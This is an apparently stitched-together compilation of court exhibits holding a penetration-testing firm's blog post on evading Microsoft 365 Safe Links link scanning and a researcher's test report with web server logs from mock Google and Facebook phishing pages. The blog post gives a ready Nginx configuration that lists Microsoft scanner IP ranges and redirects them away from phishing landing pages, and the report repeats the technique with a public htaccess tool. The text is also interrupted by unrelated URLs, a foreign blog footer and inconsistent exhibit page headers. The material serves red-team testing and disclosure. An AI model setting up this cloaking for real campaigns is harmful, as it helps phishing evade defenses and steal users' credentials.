https://www.edoeb.admin.ch/edoeb/en/home.html
http://www.wave16.com/2016/04/where-are-my-office-365-services-located__29.html
https://docs.microsoft.com/de-ch/office365/enterprise/urls-and-ip-address-ranges?
redirectSourcePath=%252fde-de%252farticle%252fURLs-und-IP-Adressbereiche-von-Office-
365-8548a211-3fe7-47cb-abb1-355ea5aa88a2
https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet
https://httpd.apache.org/docs/2.4/howto/htaccess.html
https://stackoverflow.com/questions/1020368/how-can-i-hide-or-encrypt-javascript-code
https://stackoverflow.com/questions/10916284/how-to-encrypt-decrypt-data-in-php

Dezember 12, 2018  /  ATP, Exchagne Online, Google App Engine, Hacking, Microsoft, Office 365, Open redirect, OWASP, phishing, Safe Links  /  Schreibe einen Kommentar

CRYPTRON Security GmbH – Blog  /

Case 0:20-cv-60416-XXXX   Document 1-22   Entered on FLSD Docket 02/26/2020   Page 1 of 10
Case 0:20-cv-60416-AMC   Document 3-1   Entered on FLSD Docket 02/26/2020   Page 328 of
726

# EXHIBIT 20

Case 0:20-cv-60416-AMC   Document 1-12   Entered on FLSD Docket 02/26/2020   Page 32 of 10

(888) 944-
8679

GET A
QUOTE



## Bypassing Email Security Controls (P1: URL Scanning)

Hector Monsegur

# Introduction: Bypassing Email Security

This post will be the first of a series on advanced phishing capabilities and bypassing email security mechanisms.  The focus is on URL analysis and bypassing link scanning capabilities, with Microsoft's O365 linkscanning filters used for demonstration.

The phishing techniques discussed here are not new but their continued success demonstrates the need for continued developments in email security.

Though many of the methods discussed throughout the series are not new, the very fact that most of them are successful in our social engineering engagements is an indicator that there is a lot of work to do, and defense teams need to address them.

# Phishing Background

One key area of any redteam assessment is email phishing or social engineering, and much has been written on the subject.  Although the risk of phishing is well documented, detailed information on how attackers are circumventing these defenses is important to mitigating these attacks.

User training and education is extremely important, and there are many resources online and companies like Rhino that can assist you in putting together a good education program to help deal with the human element of this attack vector. Defense teams can not stop there, as observed in Verizon's 2018 DBIR report: "4% of people will click on any given phishing campaign".

# Effectiveness of Anti-Phishing Tools

Many organizations will opt to use third-party mail exchanges like Google Mail, Office365 and others, and rely solely on those services' defense mechanisms. Although these services do a good job at dealing with common spam, default configurations may not help you in detecting, stopping or mitigating more sophisticated email attacks. Proper configuration is vital to an effective anti-phishing strategy.

When evaluating email security services, it's important to understand how malicious emails are identified, and ask questions such as...

- Does the sender domain have a valid SPF record, and is the connecting IP part of the accepted senders whitelist?
- Does the sender IP have a valid DKIM record, and is the email authentication or signature valid?
- Does the sender domain have a valid DMARC record, if so, is there a policy set to deal with bad emails?
- Does the email content itself match known malicious emails ("Click here to reset your password!")?
- **Are there links in the email to negatively reputed domains or landing page URLs?**
- **Are there links in the email that point to login pages that are detected by link protection scanning mechanisms?**
- Is the attachment in the email known to be malicious? Or is detected or flagged by signature based systems?
- (custom) Is the sender domain a permutation of the receiving domain?
- (custom) Is the sender domain a newly created or uncategorized domain?

This list is by no means complete, and I'm sure there is a lot more work being done on the backend for each service respectively. This is especially the case when a customer brings in a third party mail security provider like Proofpoint or Mimecast where they may employ other techniques that would be unseen to the attacker and users.

Our aim with every engagement is to analyze the mail server in use, identifying any security providers and preparing circumvent as many technical controls as possible.

For the sake of brevity for this first article in the series, we will be focusing on link scanning mechanisms employed by Microsoft, although what is discussed can also be applied to other services.

## Microsoft Exchange Online Protection (EOP)

Microsoft's Exchange Online Protection (or EOP) acts as an add-on to on-prem exchange or cloud-hosted mailboxes.
Below is a list of some of the features it totes:

- Inbound and outbound spam detection.
- Backscatter protection. *Note: backscatter are bounce emails generated by destination mail exchanges when an email address is not valid.*
- Bulk email filtering.
- URL block list lookups and blocking.
- Known spam and phishing sender and domain filtering.
- Anti-malware scanning and detection.

The actual list of what can be done with the service is more impressive the further you  read  through it. More importantly, it provides administrators and the security team with configuration options to further enhance how incoming email is dealt with.

### Basics of Exchange Online Protection (EOP)

Due to the way the EOP servers are positioned in the flow of email delivery, it acts as a middleman, using its

built-in scanners and user-defined configurations to filter out emails identified early on as malicious.

The following diagram gives a simplified overview of how emails are processed through the EOP service:



Connection filtering is one of the first phases of filtering that emails will go through as part of the overall email delivery process. Its purpose is to allow or block emails as defined by the respective whitelist or blacklist policies configured by administrators.

Moving forward, the Anti-Malware phase passes attachments through EOP's scanners looking for signatures that are known to be bad. Similarly to the first phase, once emails are identified as malicious they will be promptly removed.

Transport Policy Filtering offers a lot more options than connection filtering, allowing administrators to fine tune their anti-spam and routing process. Read through the documentation for more information on what kind of changes can be made from the administrator side.

Although most of the previously mentioned phases EOP passes emails through are important, the real chunk of bad emails will be caught during Content Filtering phase, where administrators can really tighten controls around email delivery dependant on their content. There are various options that can counter an active social engineering campaign, some of which include:

- Disabling image links (or 'bugs', an indicator used by phishing platforms to determine if targets opened the initial email).
- IP address links, which are commonly used to bypass web proxy filters on an internal network.

- Domain TLD blacklsits.
- Content specific filtering, blocking of sensitive words or other indicators

As a social engineer – whether part of an internal infosec team, or an external pentester – it is important to understand default configurations of email security tools like EOP and their most common changes.

## Scanning both links and attachments with EOP

As mentioned previously, content filtering is an important element to any good email security provider. In the case of EOP, and other services, part of the process that is not visible to the client is link and attachment scanning. Although you can configure whether or not attachments can be quarantined, links designated as malicious will usually be handled based on your organizations filtering policy in the background.

According to documentation, EOP's link scanning process entails:

- Identifying if links within emails point to downloadable content (think binaries and documents) and passing these through their attachment scanning engines.
- Analyzing URL reputation from various partner sources, identifying whether or not the URL is malicious.

Although rudimentary, it can become an important defense asset to mitigate a large scale social engineering campaign in the middle of traction. An attacker can put together a great phishing infrastructure and email template and still be stopped along the way by a known bad landing page URL.

Finally, although EOP does provide an introduction to email security and a decent amount of configuration options, it will fail your organization against campaigns using zero-day methods. Case in point: the service may help identify and block emails with known phishing and attachment signatures, and fail with others that do not.

## O365 Advanced Threat Protection (ATP) Addon

Beyond the EOP service, Advanced Threat Protection provides protection for more sophisticated attacks with more proactive approaches, like scanning documents for links and objects in sandboxed environments.

Core features of ATP include:

- Safe Attachments protection from unknown (or zeroday) malware.
- Safe Links, a feature that rewrites links in emails and are scanned in real-time for threats. This includes scanning documents for links and rewriting them as necessary.
- More configuration and logging options that security teams and administrators can use for fine-tuning their environment.
- Spoof intelligence, a mechanism in place to detect spoofed email to/from your organization domain.
- Machine learning and other capabilities for detecting phishing emails.

Case 0:20-cv-60416-XXXX   Document 1-2   Entered on FLSD Docket 02/26/2020   Page 3 of 10



## ATP and the 'Safe Links' Rewrite Feature

One interesting feature that was introduced by ATP is called Safe Links, where links in emails and documents are actively scanned (by EOP) and rewritten to point to an ATP gateway. Once the link is clicked and it is scanned, it will go through a series of checks before it allows you to navigate to the URL.

Some of the checks taking place during the scan:

- Determine if the link is blacklisted by the organization
- Identify whether the link points to downloadable content (documents, binaries) and scan them
- Has the link been designated as malicious previously?

At this point it will either allow you to continue to the URL or block you from accessing it with a message similar to the following:



At this point the user is warned of the malicious indicators, which drastically lowers the effectiveness of the social engineering campaign.

## Previous Attacks against EOP/ATP

Case 0:20-cv-60416-XXXX Document 1-2 Entered on FLSD Docket 02/26/2020 Page 3 of 10

Although link scanning and the 'Safe Links' mechanisms should be respected as great concepts that will attempt to deter sophisticated actors or known campaigns, it is not prone to security failures or misconfigurations. Just like any security tool, it's functionality can suffer at the hands of "features" (ergo, features which seem dangerous or seem like vulnerabilities) or bugs in the way it handles certain data.

In one finding by Oddvar Moe, he determined that ATP's 'Safe Links' mechanism can be circumvented by sending malicious links in emails without the hyperlink tag present, as in, sending a plaintext URL without making a link using "<a href=URL>". In this case, it looks like Microsoft considers this a design issue and not an actual vulnerability leaving this method open as a potential vector.

In another interesting finding, the folks at Avanan discovered that if you used the "<base>" tag, you could theoretically split the URL at the base and ATP would not properly process the links for designation. Although this issue was fixed shortly after initially reported, it was an effective method while it lasted.

# Circumventing Link-Scanning Products

Our approach to dealing with the aforementioned products (and similar) first starts with taking note of the IP ranges used by the link scanners and sandboxes. With this list in hand, we can now create a strategy on dealing with incoming traffic that we need to trick into thinking our content is legitimate.

We have observed that by redirecting traffic from EOP's ranges away from our landing pages and onto a valid URL on our target organization's domain, our success rates were high while detection remained low

Although creating custom email templates and landing pages help us achieve a good amount of success, the following really gives us an edge over this particular protection:

- Microsoft publishes the full list of EOP IP ranges at this page or via API
- Link scanning for either service (ATP/EOP) is done by EOP alone

Attacking this vector requires configuring your landing page web server to redirect traffic away from EOP and onto a legitimate as described in the following section.

# Configuring your Phishing Webserver

The following instructions are geared towards a phishing platform which uses Nginx, using the geoip module to handle redirects based on IP. There are other ways to do this, and we chose this method for no particular reason other than it simply works. Feel free to tackle this problem however you would like.

If you are using a web server or technology not based on Nginx, you should read through its documentation to give you an idea as to how to replicate the following steps:

1) Install ngx_http_geoip_module on Debian/Ubuntu

```
    1)  Install ngx_http_geoip module on Debian/Ubuntu.
        # apt install nginx-module-geoip

    2)  Modify /etc/nginx/nginx.conf to include:
load_module modules/ngx_http_geoip_module.so;

    3)  Create a 'bad' array inside of /etc/nginx/conf.d/[domain].conf before the main server {} config:
geo $bad_user {
  default 0;
  2a01:111:f400:7c00::/54 1;
  2a01:111:f400:fc00::/54 1;
  2a01:111:f403::/48 1;
  23.103.132.0/22 1;
  23.103.136.0/21 1;
  23.103.144.0/20 1;
  23.103.198.0/23 1;
  23.103.200.0/22 1;
  40.92.0.0/14 1;
  40.107.0.0/17 1;
  52.100.0.0/14 1;
  52.238.78.88/32 1;
  65.55.88.0/24 1;
  65.55.169.0/24 1;
  94.245.120.64/26 1;
  104.47.0.0/17 1;
  157.55.234.0/24 1;
  157.56.110.0/23 1;
  157.56.112.0/24 1;
  207.46.100.0/24 1;
  207.46.163.0/24 1;
  213.199.154.0/24 1;
  213.199.180.128/26 1;
  216.32.180.0/23 1;
}

    4)  Modify the location config for / within /etc/nginx/conf.d/[domain].conf to look like:
location / {
  if ($bad_user) {
    rewrite ^ http://www.contoso.com/target/path/;
    }
}
```

Once these four steps are completed, you can restart the server and test out your landing pages. For testing purposes, you should add your IP address/range to the bad_user list to confirm redirections are properly taking place once you hit the landing page.

## Applying this Attack to other Email Security Tools

Using redirects to trick link scanning products is nothing new, and has been observed throughout various APT campaigns or red team engagements.

I recently discovered a great tool by @violentlydave called  mkhtaccess_red which is able to generate functional .htaccess files, redirecting traffic to bypass known sandbox and threat protection providers.  Another great tool for your red teaming / phishing toolkit.

## Remediating Phishing Vulnerabilities

The first step for preventing these attacks is to take advantage of ATPs powerful configuration options, ensuring that links are configured to display warnings and never allow users to 'proceed' and bypass the prompt.

Integrating DNS security tools – whether locally on the corporate network or as a cloud service – can also help

Case 0:20-cv-60416-XXXX   Document 1-12   Entered on FLSD Docket 02/26/2020   Page 9 of 10

catch web traffic from users clicking phishing links.  Using a service which categorizes and blocks newly created domains will address most malicious links you encounter. Pairing this with a web proxy to inspect the web traffic directly can take this protection even further.

## User Education and Training

With the human element being the most vulnerable here, social engineering training is extremely important for any organization. Teaching your employees how to spot phishing pages and other indicators, as well as how to properly report the offending payloads will make the difference at the end of the day.

# Conclusion

As mentioned previously, these techniques aren't new but are important to understanding impact if technical controls are circumvented. Going beyond ATP and EOP, almost any other similar service will fall prey to these kind of attacks.

It is important to look at your security capabilities from both the defender and attacker view, as it will provide you a broader insight as to where you stand today.  Defending your users requires a multi-faceted approach, and I am hopeful with articles like these that organizations can advance their email security posture.

## Related Resources



Risk Misconceptions in Social Engineering



Client-Seconds Exceptions in Azure FEV



Abusing Microsoft Word Features for Phishing: "subDoc"

Interested in more information?



Contact Us Today      »

## ASSESSMENT SERVICES

Network Penetration Test
Webapp Penetration Test
AWS Cloud Penetration Testing
GCP Cloud Penetration Testing
Azure Penetration Testing
Mobile App Assessment
Secure Code Review
Social Engineering / Phishing Testing
Vishing (Voice Call) Testing
Red Team Engagements

## INDUSTRIES

Healthcare
Finance
Technology
Retail

## RESOURCES

Technical Blog
Strategic Blog
Example Pentest Report
Technical Research
Vulnerability Disclosures
Disclosure Policy
Penetration Testing FAQ
Support: AWS Pentest Form

## COMPANY

Leadership
Blog
Careers
Company Principles
Contact Us
Get a Quote
RSS Feed

## ABOUT US

Rhino Security Labs is a top penetration testing and security assessment firm, with a focus on cloud pentesting (AWS, GCP, Azure), network pentesting, web application pentesting, and phishing.
With manual, deep-dive engagements, we identify security vulnerabilities which put clients at risk.

Endorsed by industry leaders, Rhino Security Labs is a trusted security advisor to the Fortune 500.

info@rhinosecuritylabs.com

(888) 944-8679

Rhino Security Labs, Inc

# EXHIBIT 21

The Bearded Man LTD - Mikail Tunç

1

# PhishViewer: Phase 1 Report

## Introduction

The purpose of this report is to present my findings with regards to the Microsoft Advanced Threat Protection: Safe Links feature. Specifically around:

- The determination of whether the Office 365 / Outlook.com *Safe Links* feature remains susceptible to *Bypass Method 2* listed in the following article: https://emtunc.org/blog/03/2017/bypassing-safe-links-exchange-online-advanced-threat-protection/

I will go through the testing set-up and approach used to perform the tests; finally I will summarise the findings from the tests.

## Test Set-up

The e-mail account *safe-links-test@outlook.com* was registered on Outlook.com. In order to get access and test the advanced security features (such as *Safe Links*), a premium subscription was purchased.

For the avoidance of doubt, the *Safe Links* feature in Outlook.com and Office 365 are the same. Office 365 allows for granular customisation of *Safe Links* policies however the policies are not in scope of this test nor are they relevant to determine whether *Safe Links* is susceptible to bypass.

During the tests, I used two subdomains: *safe-links.emtunc.org (tests with no bypass techniques were run here)* and *safe-links-2.emtunc.org (tests with bypass techniques were run here)*. Both subdomains pointed to a server that I had full control over. This server was running a vanilla install of Ubuntu 19.04 and Apache web server version 2.4.38.

I performed 4 distinct tests for the purpose of producing the report. The tests were run under two different scenarios - one with no bypass techniques implemented and the second *with* bypass techniques implemented - this made for 8 tests in total (4 tests * 2 scenarios)

The bypass technique used was from an open source code repository which can be found here: https://github.com/violentlydave/mkhtaccess_red

In a nutshell, the bypass technique grabs a list of known sandbox/malware-detonation IP addresses and adds them to a special file (.htaccess) which the web server uses to redirect said IP addresses to a fake 'good' page whilst leaving the victim to go to the original, 'bad'

page. For complete transparency, the contents of the .htaccess file used in these tests can be found here: https://pastebin.com/gWAazFqB

# How does the Safe Links feature work?

To better understand the testing performed and the results obtained, it would be useful to have a brief understanding of the *Safe Links* feature and how it works.

*Safe Links* is a feature designed to protect users falling victim of phishing scams and other malicious activity such as being infected by malware served from malicious web pages. This is how it works:

1. A bad actor sends an email containing a malicious URL in the email body. For argument's sake, let's say the URL in the email is http://*safe-links.emtunc.org/facebook-1*

2. When Outlook/Office 365 processes the email, it rewrites *all* URLs so that although the victim visually sees http://safe-links.emtunc.org/facebook-1, they actually get redirected to a Microsoft owned domain which looks something like this: https://eur01.safelinks.protection.outlook.com/?url=http://safe-links.emtunc.org/facebook-1

   The email will look identical to the below - notice how even though the user visually sees the original URL, it has actually been rewritten to go to a *.safelinks.protection.outlook.com page (look at the highlighted section at the bottom of the screenshot)



The Bearded Man LTD - Mikail Tunç

4

3.  When the victim clicks on the URL, they are taken to the Microsoft owned domain which will do one of two things:

    a.  If the website has not been scanned yet or is otherwise not marked as 'unsafe': the victim will be redirected from the Microsoft owned domain to http://safe-links.emtunc.org/facebook-1

    b.  If the website has been classified as 'unsafe' by *Safe Links* then the victim will remain on the Microsoft owned domain and see a page that looks like this:



Visiting this website might not be safe.

Outlook has blocked the link http://safe-links.emtunc.org/facebook... . This website might harm your computer or cause your personal information to be stolen. We recommend that you do not continue.



Continue anyway (not recommended) ›

# Summary of Findings

The tests showed that the *Microsoft Advanced Threat Protection Safe Links* feature remains
susceptible to trivial bypass techniques. The *Safe Links* feature is highly ineffective against
the most basic forms of phishing and malware delivery and should not be solely relied upon
to detect and prevent phishing/malware attacks against users.

My findings from the tests are summarised below:

- The *Safe Links* feature is trivially bypassed by using the IP Cloaking technique
  whereby the security scanner is redirected to a fake 'safe' page but the victim(s) are
  sent to the original 'bad' page

- When a URL is not marked as 'unsafe', *Safe Links* forwards the victim's browser
  directly to the original URL that was in the email

- *Safe Links* does *not* have the ability to see the malicious destination if the IP
  Cloaking technique is used - i.e., if we have tricked the security scanners to go a
  good page, *Safe Links* will always forward the user on to the original URL- even if the
  final destination ends up being a URL that is on a *Safe Link* blacklist/unsafe list.

- The Safe Links feature did not scan links before clicking on them - even after leaving
  sufficient time (5 minutes in one test and upwards of 10 minutes in another) between
  sending an email with a malicious link and actually clicking on it

- The Safe Links feature scans the page anywhere from 10-21 seconds after the user
  has already clicked through to the page

To conclude, it is disappointing that a trivial attack against *Safe Links* that was described and
reported to Microsoft in January 2017[1], still works in 2019; even after the publication of
further and more sophisticated bypasses on the internet.

For transparency, I have included two .PDF files which include my interactions with the
Microsoft Security Response Center where they conclude that the IP Cloaking/bypass
method (along with other bypass techniquesI communicated with them) *"doesn't meet
security servicing bug bar"*

https://drive.google.com/file/d/1jORRuuZxZASwo1vnixSuEv1CB7Puucjh and
https://drive.google.com/file/d/1tExh06fY7k4YLsM2Ru3RmVE8Ssa-0ByV

The Bearded Man LTD - Mikail Tunç

6

# Tests - No Bypass Techniques Implemented

*Note: The IP address **88.98.209.138** found in the web server access logs is my IP address. IP addresses other than the above belong to Microsoft Corporation; confirmed by querying publicly available [whois](whois) data*

## Test 1: Google Phishing Page

- Original URL: http://safe-links.emtunc.org/google-1/
- Rewritten URL:
  https://eur01.safelinks.protection.outlook.com/?url=http%3A%2F%2Fsafe-links.emtun
  c.org%2Fgoogle-1%2F&data=02%7C01%7C%7C4c59f71bec5c44d0384508d725afb
  a1a%7C84df9e7fe9f640afb435aaaaaaaaaaaa%7C1%7C0%7C63701930897522282
  5&sdata=xqvGAv322JXk8bp7T%2Bjh4tg75ICT2ZGM7VskH3fZMtw%3D&reserved=0
- I was taken directly to the phishing page - evidence of this can be seen in the web server access logs
- The web server logs also show that the Microsoft Online Protection scanner connected to the web server 10 seconds after I had already been redirected to the original URL

```
88.98.209.138 - - [20/Aug/2019:20:49:24 +0000] "GET /google-1/ HTTP/1.1" 200 2266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
88.98.209.138 - - [20/Aug/2019:20:49:24 +0000] "GET /google-1/static/css/bootstrap.min.css HTTP/1.1" 200 20084 "http://safe-links.emtunc.org/google-1/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
88.98.209.138 - - [20/Aug/2019:20:49:24 +0000] "GET /google-1/static/js/jquery.min.js HTTP/1.1" 200 29885 "http://safe-links.emtunc.org/google-1/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
88.98.209.138 - - [20/Aug/2019:20:49:24 +0000] "GET /google-1/static/css/style.css HTTP/1.1" 200 1180 "http://safe-links.emtunc.org/google-1/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
88.98.209.138 - - [20/Aug/2019:20:49:24 +0000] "GET /google-1/static/img/dtnk16mcjo.png HTTP/1.1" 304 182 "http://safe-links.emtunc.org/google-1/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
88.98.209.138 - - [20/Aug/2019:20:49:24 +0000] "GET /google-1/static/img/yqczrisvt2.png HTTP/1.1" 304 181 "http://safe-links.emtunc.org/google-1/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
88.98.209.138 - - [20/Aug/2019:20:49:24 +0000] "GET /google-1/static/img/tmjjgvk28i.png HTTP/1.1" 200 2266 "http://safe-links.emtunc.org/google-1/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
40.107.204.77 - - [20/Aug/2019:20:49:34 +0000] "GET /google-1/ HTTP/1.1" 200 2266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
40.107.204.77 - - [20/Aug/2019:20:49:34 +0000] "GET /google-1/static/js/jquery.min.js HTTP/1.1" 200 29885 "http://safe-links.emtunc.org/google-1/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
40.107.204.40 - - [20/Aug/2019:20:49:34 +0000] "GET /google-1/static/css/bootstrap.min.css HTTP/1.1" 200 1180 "http://safe-links.emtunc.org/google-1/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
40.107.204.16 - - [20/Aug/2019:20:49:34 +0000] "GET /google-1/static/css/bootstrap.min.css HTTP/1.1" 200 20084 "http://safe-links.emtunc.org/google-1/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
40.107.204.77 - - [20/Aug/2019:20:49:35 +0000] "GET /google-1/static/img/dtnk16mcjo.png HTTP/1.1" 200 5560 "http://safe-links.emtunc.org/google-1/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
40.107.204.77 - - [20/Aug/2019:20:49:35 +0000] "GET /google-1/static/img/yqczrisvt2.png HTTP/1.1" 200 910 "http://safe-links.emtunc.org/google-1/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
40.107.204.77 - - [20/Aug/2019:20:49:35 +0000] "GET /google-1/static/img/tmjjgvk28i.png HTTP/1.1" 200 4571 "http://safe-links.emtunc.org/google-1/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
40.107.204.77 - - [20/Aug/2019:20:49:37 +0000] "GET /google-1/static/img/oc3ccxmbvf.png HTTP/1.1" 200 1616 "http://safe-links.emtunc.org/google-1/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
```

## Test 2: Facebook Phishing Page

- Original URL: http://safe-links.emtunc.org/facebook-1
- Rewritten URL:
  https://nam02.safelinks.protection.outlook.com/?url=http%3A%2F%2Fsafe-links.emtu
  nc.org%2Ffacebook-1%2F&data=02%7C01%7C%7C507f0397e76d464c208908d72
  5b21b9d%7C84df9e7fe9f640afb435aaaaaaaaaaaa%7C1%7C0%7C6370193192018
  13606&sdata=SDmBS06IZnAIWis3guPRvu5oJdDokeNJGJlAmKc%2BTG4%3D&res
  erved=0

- I was taken directly to the phishing page - evidence of this can be seen in the web server access logs
- The web server logs also show that the Microsoft Online Protection scanner connected to the web server 17 seconds after I had already been redirected to the original URL

```
88.98.209.138 - - [20/Aug/2019:21:16:07 +0000] "GET /facebook-1/ HTTP/1.1" 200 2628 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
88.98.209.138 - - [20/Aug/2019:21:16:08 +0000] "GET /facebook-1/static/css/normalize.min.css HTTP/1.1" 200 1302 "http://safe-links.emtunc.org/facebook-1/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
88.98.209.138 - - [20/Aug/2019:21:16:08 +0000] "GET /facebook-1/static/css/fonts.css HTTP/1.1" 200 558 "http://safe-links.emtunc.org/facebook-1/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
88.98.209.138 - - [20/Aug/2019:21:16:07 +0000] "GET /facebook-1/static/js/jquery.min.js HTTP/1.1" 200 29885 "http://safe-links.emtunc.org/facebook-1/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
88.98.209.138 - - [20/Aug/2019:21:16:08 +0000] "GET /facebook-1/static/fonts/Lato-700.woff2 HTTP/1.1" 200 16654 "http://safe-links.emtunc.org/facebook-1/static/css/fonts.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
88.98.209.138 - - [20/Aug/2019:21:16:08 +0000] "GET /facebook-1/static/fonts/Lato-regular.woff2 HTTP/1.1" 200 16698 "http://safe-links.emtunc.org/facebook-1/static/css/fonts.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
88.98.209.138 - - [20/Aug/2019:21:16:08 +0000] "GET /facebook-1/static/img/fm5arwc28y.png HTTP/1.1" 200 867 "http://safe-links.emtunc.org/facebook-1/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
13.86.32.181 - - [20/Aug/2019:21:16:25 +0000] "GET /facebook-1/ HTTP/1.1" 200 2628 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
13.86.32.181 - - [20/Aug/2019:21:16:25 +0000] "GET /facebook-1/static/js/jquery.min.js HTTP/1.1" 200 29885 "http://safe-links.emtunc.org/facebook-1/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
13.86.32.181 - - [20/Aug/2019:21:16:25 +0000] "GET /facebook-1/static/css/fonts.css HTTP/1.1" 200 558 "http://safe-links.emtunc.org/facebook-1/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
13.86.32.181 - - [20/Aug/2019:21:16:25 +0000] "GET /facebook-1/static/css/normalize.min.css HTTP/1.1" 200 1302 "http://safe-links.emtunc.org/facebook-1/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
13.86.32.181 - - [20/Aug/2019:21:16:25 +0000] "GET /facebook-1/static/fonts/Lato-700.woff2 HTTP/1.1" 200 16654 "http://safe-links.emtunc.org/facebook-1/static/css/fonts.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
13.86.32.181 - - [20/Aug/2019:21:16:28 +0000] "GET /facebook-1/static/img/fm5arwc28y.png HTTP/1.1" 200 867 "http://safe-links.emtunc.org/facebook-1/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
```

## Test 3: Eicar Anti-Malware Test File

- Original URL: http://safe-links.emtunc.org/eicar-2/eicar.com.txt
- Rewritten URL:
  https://eur01.safelinks.protection.outlook.com/?url=http%3A%2F%2Fsafe-links.emtunc.org%2Feicar-2%2Feicar.com.txt&data=02%7C01%7C%7C3a7491d3a09846a6b4d208d725b50f13%7C84df9e7fe9f640afb435aaaaaaaaaaaa%7C1%7C0%7C637019331874023346&sdata=tHzOf%2Fl4DH2aXfRq8vhmlJsS%2FQoNx56zJL0lBFjAB6E%3D&reserved=0
- I was taken directly to the malware test file/page - evidence of this can be seen in the web server access logs
- The web server logs also show that the Microsoft Online Protection scanner connected to the web server 14 seconds after I had already been redirected to the original URL

```
88.98.209.138 - - [20/Aug/2019:21:27:41 +0000] "GET /eicar-2/eicar.com.txt HTTP/1.1" 200 352 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
40.94.94.3 - - [20/Aug/2019:21:27:55 +0000] "GET /eicar-2/eicar.com.txt HTTP/1.1" 200 352 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
40.94.94.3 - - [20/Aug/2019:21:27:58 +0000] "GET /favicon.ico HTTP/1.1" 404 512 "http://safe-links.emtunc.org/eicar-2/eicar.com.txt" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
```

## Test 4: A different Facebook Phishing Page

- Original URL: http://safe-links.emtunc.org/facebook-2
- Rewritten URL:
  https://eur03.safelinks.protection.outlook.com/?url=http%3A%2F%2Fsafe-links.emtunc.org%2Ffacebook-2%2F&data=02%7C01%7C%7C94bc54a1cde5446abe4608d725bbb808%7C84df9e7fe9f640afb435aaaaaaaaaaaa%7C1%7C0%7C637019360477954

The Bearded Man LTD - Mikail Tunç

8

5997&sdata=oe4fO0U22zxXQ7OOKFozvPladnc%2BskLaNPmmrvVJKlo%3D&reserved=0

- Initially, the URL was marked as safe and I was taken directly to the phishing page - evidence of this can be seen in the web server access logs
